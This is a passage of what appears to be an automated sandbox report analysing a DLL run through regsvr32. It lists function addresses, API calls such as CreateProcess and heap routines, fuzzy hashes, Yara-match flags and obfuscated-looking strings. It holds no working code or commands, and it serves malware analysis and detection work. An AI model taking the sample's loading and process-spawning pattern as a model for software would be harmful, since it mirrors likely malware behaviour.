                                                                    • free.LIBCMT ref: 00007FF8CA9B226F
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                    • String ID:
                                                                    • API String ID: 1549890855-0
                                                                    • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction ID: 202dac84b0809f9244e0ca614498e95aff72b8fba79befded7f25c502a160664
                                                                    • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction Fuzzy Hash: 1F31AB20E0D70391FB78AFA178AF2BA21959F557D4F1041F4DA3DC96E2EE2CB44C5222
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B4CD4 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FF8CA9B4CF3
                                                                      • Part of subcall function 00007FF8CA9B497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF8CA9B4D0E,?,?,?,?,?,00007FF8CA9B4EE3), ref: 00007FF8CA9B49A6
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • free.LIBCMT ref: 00007FF8CA9B4D7F
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B4DB7
                                                                    • free.LIBCMT ref: 00007FF8CA9B4E67
                                                                    • free.LIBCMT ref: 00007FF8CA9B4E97
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B4E9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                    • String ID:
                                                                    • API String ID: 1264244385-0
                                                                    • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction ID: 79ba7fdb18ba393eac935a8fc6b3cfc01cca47f35e88c9432f72cd8e1bb06993
                                                                    • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction Fuzzy Hash: D651AC31908B4286E7609F65B42A2B9B7A1FBC4BD8F1442B6D66E83395CF3CE409D704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B6C34 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 502529563-0
                                                                    • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction ID: f617e944d5640d0a7101eb83c6c3fc81e892af7480081c24e5f42b5773ed52e1
                                                                    • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction Fuzzy Hash: A8114C21A0975281FB206F61B86A2BA3291DF84BD0F0452B0EB3D877C2CE3CF4488711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B1EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                    • String ID: vb4vcW2kAW3Twaz?30
                                                                    • API String ID: 254689257-4179232793
                                                                    • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction ID: e55e1f7f4986706372130b7cf02d153578273b484cddb23457f56dfae817c361
                                                                    • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction Fuzzy Hash: 9621053260CF8286E7308F14F4693AA77A5FB88788F0045B5CADD83765DF7DA5098B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2FA0 Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B36F0: _initp_misc_winsig.LIBCMT ref: 00007FF8CA9B3729
                                                                      • Part of subcall function 00007FF8CA9B36F0: EncodePointer.KERNEL32(?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B3745
                                                                    • FlsAlloc.KERNEL32(?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B2FBB
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B2FEC
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B3000
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 54287522-0
                                                                    • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction ID: 5a526164dcd51689f87691974bfd4e654d9fc832474b8655675707f6429635c5
                                                                    • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction Fuzzy Hash: FA014420E08B0341FB34EF71B82F27522A19F057E0F1442B4D53DC62E1EE2CA44DD221
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180001BDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: :}
                                                                    • API String ID: 963392458-2902022129
                                                                    • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                    • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2050 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID: JKvDDasqwOPvGXZdqW
                                                                    • API String ID: 621844428-4059861069
                                                                    • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction ID: a3c66bf4d30574f34297a8570581242f6b58086028b6d812d26de4b6d8c548e6
                                                                    • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction Fuzzy Hash: 3FD09E21A58B8182D6209B10F85A35A63B0FB99388F800170D5DC86624DF7CD15AC704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B6CEC Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6D0F
                                                                      • Part of subcall function 00007FF8CA9B66D8: DecodePointer.KERNEL32 ref: 00007FF8CA9B66FF
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FF8CA9B313B,?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF), ref: 00007FF8CA9B6D58
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateDecodeHeapPointer_errno
                                                                    • String ID:
                                                                    • API String ID: 15861996-0
                                                                    • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction ID: dc1e15c33125aa3f2f4ed88b9ff7a18a65a00ada06547983496037db19f0226b
                                                                    • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction Fuzzy Hash: 6D119126B0934286FB655F25FA6E3B962D19F807E4F088A74CB3D876C4DE7CB4488600
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B36F0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _initp_misc_winsig.LIBCMT ref: 00007FF8CA9B3729
                                                                      • Part of subcall function 00007FF8CA9B755C: EncodePointer.KERNEL32(?,?,?,?,00007FF8CA9B373E,?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B7567
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B3745
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer$_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 190222155-0
                                                                    • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction ID: 1dda6143daeeec70ce7cf795af670fc44eb10a2a950537326ee6afa1a61affd4
                                                                    • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction Fuzzy Hash: F4F02214E8A74740EE29FF62787B1F822404F96BC0B8821F4E92E9A3D3DD6CE5598754
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B4110 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CreateInformation
                                                                    • String ID:
                                                                    • API String ID: 1774340351-0
                                                                    • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction ID: 534d04f972ddaa9814ab5bed5f1183a5713604be2f9022ae569a49d19499db90
                                                                    • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction Fuzzy Hash: F1E04F75E25B9183E798AF21B86E7696250FB98384F805079EA5E82794DF3CD0498B10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B73F4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B34AF,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B740D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction ID: eae910700445f82e42901b8eca9046a0228bafb851ec09d70bfb24d5d46d259a
                                                                    • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction Fuzzy Hash: D3D01222F58A4182DB208F25F5A62A83265EB84BD4F589071D66C46645DD2CC45A8701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B3108 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction ID: 84d9ac298652287cda40fc3205a989951b6c3fe009229469df5dde672fdd809f
                                                                    • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction Fuzzy Hash: 4301A222A24B8186EB549F16B86502AB6A5FB88FD0F084171DE6D43B50DF38E859C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B309C Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6C64
                                                                      • Part of subcall function 00007FF8CA9B6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3), ref: 00007FF8CA9B6C89
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CAD
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CB8
                                                                    • Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeapSleep
                                                                    • String ID:
                                                                    • API String ID: 4153772858-0
                                                                    • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction ID: 8a3f63257d62c0fc72354ee1441a3c692975470ea54d03697f871525fcce37c1
                                                                    • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction Fuzzy Hash: 82F0C232A19B8582EA60DF16B46612E7260FB84BD0F440174EA6D83B55DF3CE89A8700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00007FF8CA9B895C Relevance: 24.4, APIs: 16, Instructions: 377COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1446610345-0
                                                                    • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction ID: 68a5a8a46f85fdd35c0f2e147da662dcb24fa8216fb3520e1942ede157edd372
                                                                    • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction Fuzzy Hash: 82F1D472A087418AE7309F21F46A1A977D1FB487D8F548675EA2D87B94DF3CE9488700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B7BE8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                    • API String ID: 1558914745-1064046199
                                                                    • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction ID: 7da2887ccf4cdb88b9c44d835f2f9540514ffd3c193f9974934ef7a7391c87e5
                                                                    • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction Fuzzy Hash: 82314F21A09B4286FB20AF65B47F3B92291AF447C4F4445B8DA6DCB796DE3CE44D8701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC934 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
